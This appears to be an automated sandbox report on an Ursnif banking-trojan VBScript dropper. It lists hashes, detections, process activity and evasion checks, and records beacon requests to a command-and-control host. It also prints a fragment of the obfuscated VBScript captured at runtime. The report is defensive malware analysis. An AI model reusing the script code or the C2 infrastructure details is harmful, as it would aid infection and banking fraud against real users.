Loading ...

Play interactive tourEdit tour

Analysis Report GnPS5qD6et8h.vbs

Overview

General Information

Sample Name:GnPS5qD6et8h.vbs
Analysis ID:283043
MD5:5fba699119c2f87ba7236901f9e05dd3
SHA1:2c439c95b867087d2f6f7d7b8678cce9af671071
SHA256:14b3380105c6096dce3c4ead191c2ed2173fc472d02a869c09cbfa475476de7d

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
WScript reads language and country specific registry keys (likely country aware script)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6476 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\GnPS5qD6et8h.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6408 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4144 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6408 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5760 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 7124 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5760 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5948 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5948 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6784 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4804 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6784 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.426110309.0000000005B78000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.426254613.0000000005B78000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.426241527.0000000005B78000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.426223190.0000000005B78000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.426192829.0000000005B78000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 3 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\obscure.movAvira: detection malicious, Label: TR/Crypt.Agent.qowkb
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\obscure.movVirustotal: Detection: 58%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\obscure.movReversingLabs: Detection: 48%
            Multi AV Scanner detection for submitted fileShow sources
            Source: GnPS5qD6et8h.vbsVirustotal: Detection: 22%Perma Link
            Source: GnPS5qD6et8h.vbsReversingLabs: Detection: 12%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\obscure.movJoe Sandbox ML: detected
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: global trafficHTTP traffic detected: GET /api1/kbI5HEcnGy5/Obrn9Ns9Xlc_2B/SFnqkOhApFzqLMoHMd04x/IJVrFxSBZ91yqJIo/prHWbKEgFW954dL/tH_2BRMNZezB3GOSa1/GMCLmKQ4i/Oyve6u6Pn2acBUU_2B5i/IP1Sll1FJZgild2DVPA/lw1AZNOvxeXttGajVThZR2/eSPIHUT3H3Bni/F6FqU_2B/6sPsN6LybJ_2FByQXfUbMNo/X_2F8mjuzd/33W4GBUFYNaoSjuB_/2BZmXZaiL2F1/TTZeMUrc8p3/Vw3bOvI_0A_0Dj/tnAVmDgOtjzKnM0H2ug5_/2BVQOS7L7Svyg782/klQSFzTXyU/z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/JBgTZQjP/Bjk9jJFlJReRI3l1ERcwKtv/Djm647cu_2/B1GnkDLlGg1sOmJWV/1sFYQQFq5tnu/UNKQAIj0i8B/TRjGj5YheVE3tz/091W8CaR3WOkJ63Yi4WzO/6BsHqAjzF599Lbbs/Q6drtGW2VUIcmNR/r5_2BrmFg5BOF8kW59/oQYYzo3l9/oF8N83xjOJRq0uLYQtM6/Hq1_2Fq3tvbTdo0mfpu/5Q1edUy9Sqp6oVnI0m8JfM/YG1Blv2ggAprN/O4FTcVh1/6O_0A_0DX8gavnKlwaf8dbA/ZElLBVqQia/UgRvcGilkZJ3_2FSr/Or7yvoYwoBaG/I9CyLc1rLFJ/J2f1G HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/SxN14BgG/QdNur1IFqozQBTDjdkWdcHW/kHhGVOd2xn/gcTAgcmA6CQmxZMqW/Bwl6xrVJnU5v/_2BcZ2rRi8_/2FfDqgM8hXmjz5/MTaXdT2B0TN_2Br3dznA5/nA9mGU2qhqLxqzCz/FycET99IadarRvC/fqjs4nHhaxCI6gYagR/P_2F7g4SX/bjvu6ISg2ZhgCizkVJLO/jQuKPoDWvMssiF1LdhJ/0urjDxstgrYvBo_2BtjWy8/9EkLCr1mtIcNU/RiAedONO/KWXFQC_0A_0Dn9pVyCPrfpK/DTCD_2Bcgv/CcbR0W4ugH53j4Atz/wZQeUFP3irX_/2Fy3EcSEEGDcBwmmQq820/h HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/Lpu1ITYXXHm1_2B_2FbZwsX/XeqddyyTJe/PZTCDn9EnX43Byyo4/N2IlCzHBV8S1/bUhPMvppe3y/qpNOWKOXF_2FrD/5rPR1eKwmziGDYCUOZsTh/_2BEB_2BcwB3a1mH/BvhU12owic9vcc_/2FTiLKpcLartJLN4VS/BK_2B67wK/1vEEjN_2FZER4dmd7Irp/YQUo4SE8_2BcQNhhcEV/Jg38bn7xcPl2BJe1Gbh7bK/YM7R7J42nGfu5/YsNpMi7l/9wmWuduCMX43FFkFg5PaXI_/0A_0D9ELOi/G4G4fqAKEpEBerhvV/SxH2mo2Adk45/gVQFSvDcuEf/wQUhb07SJd25MLANb8hJM/QC HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: msapplication.xml1.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x67065a0d,0x01d68638</date><accdate>0x67065a0d,0x01d68638</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x67065a0d,0x01d68638</date><accdate>0x67065a0d,0x01d68638</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x670b1f12,0x01d68638</date><accdate>0x670b1f12,0x01d68638</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x670b1f12,0x01d68638</date><accdate>0x670b1f12,0x01d68638</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x670d8110,0x01d68638</date><accdate>0x670d8110,0x01d68638</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.10.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x670d8110,0x01d68638</date><accdate>0x670d8110,0x01d68638</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Sep 2020 14:32:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: msapplication.xml.10.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml2.10.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml3.10.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml4.10.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml5.10.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml6.10.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml7.10.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml8.10.drString found in binary or memory: http://www.youtube.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.426110309.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426254613.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426241527.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426223190.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426192829.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426136612.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426073316.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426167733.0000000005B78000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.426110309.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426254613.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426241527.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426223190.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426192829.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426136612.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426073316.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426167733.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: GnPS5qD6et8h.vbsInitial sample: Strings found which are bigger than 50
            Source: obscure.mov.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
            Source: obscure.mov.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
            Source: obscure.mov.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: obscure.mov.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: classification engineClassification label: mal100.troj.evad.winVBS@13/20@6/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\GnPS5qD6et8h.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: GnPS5qD6et8h.vbsVirustotal: Detection: 22%
            Source: GnPS5qD6et8h.vbsReversingLabs: Detection: 12%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\GnPS5qD6et8h.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6408 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5760 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5948 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6784 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6408 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5760 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5948 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6784 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\LyncJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell")rbmSMpT = rBiLbi.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\" + "982559365" + ".txt"If WScript.CreateObject("Scripting.FileSystemObject").FileExists(rbmSMpT) ThenShvVWW = (((42 - (72 - 36.0)) + (-5.0)) - 1.0)ElseShvVWW = (((47 - 14.0) + (-(2444 - 2414.0))) - 2.0)End If' Lana moody, effaceable jive redolent next952 Rutherford Nietzsche blown franco teach ramshackle Epstein, propelled metabole pressure expurgate, 4676802 Cruz Pascal runabout puffin shrewd myrtle sunfish Hamal Verne warty rectangle. holiday Barnabas Messrs ale immobile plenary squall anatomist configure. backside haunt Raman calm phenol pearl keno chickweed hygrometer noisemake anomie Aleutian vertigo confederacy choose depend incomplete Marin penny scimitar footfall resemble, 2424020 shipman thickish gush Warburton Tahiti pdbhxmPD = ShvVWWEnd FunctionFunction FqkaN()on error resume nextREM boat. Isfahan Sault pixel faceplate Isfahan228 had angstrom Wier leachate hewn nought archaic Ferreira panorama focus molybdenum cross treetop dusty scherzo. trolley mailman, turtle chancel buttress deferrable watchful implant global curvaceous Margo hieratic Arrhenius, salutation sib keelson stud discoid consternate replenish unction secrete superintendent. riffle headstand rabbinate fright eventful puny Circe Pasteur map infeasible coax cowherd. 6459105 knowledgeable funny rhapsody drizzle featherbed pineapple sufficient tort irradiate suffer gestalt theoretic jenny aniseikonic. 9913787 If (InStr(WScript.ScriptName, cStr(982559365)) > 0 And pdbhxmPD = 0) ThenExit FunctionEnd If' germane concur Fulton voyage falconry, aloe donate sepulchral masochist Rutledge lord ANSI quilt, triptych decisive emaciate, letterhead dishwasher sheathe executrix baseband calculable flatbed magma lynch feline various, 7871931 strung Bengali thrush doltish equestrian audiovisual NJ flashlight, Christiana dispensate, rheumatism oh alien. 847419 glare caveat. 1020822 McDougall anther Ivanhoe pyroxenite Leslie Beecham. 3481286 Chomsky colic flogging warfare. 8346634 rhubarb aqua drama applicant Sana ineligible238 glycerin rackety, amy cocktail Eugenia, Philadelphia Orin deadlock furthest. 8459629 trap Karol y guzzle sonority Farber venial coprinus loch = 15if (loch > ((46 - (92 - 74.0)) + (-(38 + (-20.0))))) ThenBnAty = Array(203)' legitimacy. dishwasher148 cottontail genie. inch documentary Tolstoy Newtonian. 6067308 consent Laughlin gossip kid slash well divergent topaz heap Pete cookery compassion aristocrat sensory budgetary cry428 Katz. 3190964 pollinate implementer heroic courteous folksinging Reese Kyle parapsychology prokaryotic annelid Berra spicebush nature pietism Erato sparse exterior hydroxylate Eaton Vienna, amongst Shapiro Nelsen dice Monday. regressive pessimist systemwide vortices vinegar Strauss micron perturbate Palermo Polaroid heritage Marianne rockaway centenary myriad adhere shipman222, biconnected. 1474890 Nicholson Lucian drub conscript, dozen relic, stum
            Source: obscure.mov.0.drStatic PE information: section name: .data2
            Source: obscure.mov.0.drStatic PE information: section name: .data5
            Source: obscure.mov.0.drStatic PE information: section name: .data4
            Source: obscure.mov.0.drStatic PE information: section name: .data3

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\obscure.movJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\obscure.movJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.426110309.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426254613.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426241527.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426223190.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426192829.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426136612.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426073316.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426167733.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\gnps5qd6et8h.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            WScript reads language and country specific registry keys (likely country aware script)Show sources
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo NationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\obscure.movJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 5772Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: wscript.exe, 00000000.00000002.401987110.000002245B140000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000000.00000002.401987110.000002245B140000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.401987110.000002245B140000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.401987110.000002245B140000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: obscure.mov.0.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bog.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bog.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bog.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bog.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bog.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bog.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bog.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bog.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bog.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.426110309.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426254613.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426241527.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426223190.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426192829.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426136612.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426073316.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426167733.0000000005B78000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.426110309.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426254613.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426241527.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426223190.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426192829.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426136612.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.426073316.0000000005B78000.00000004.00000040.sdmp, type: MEMORY
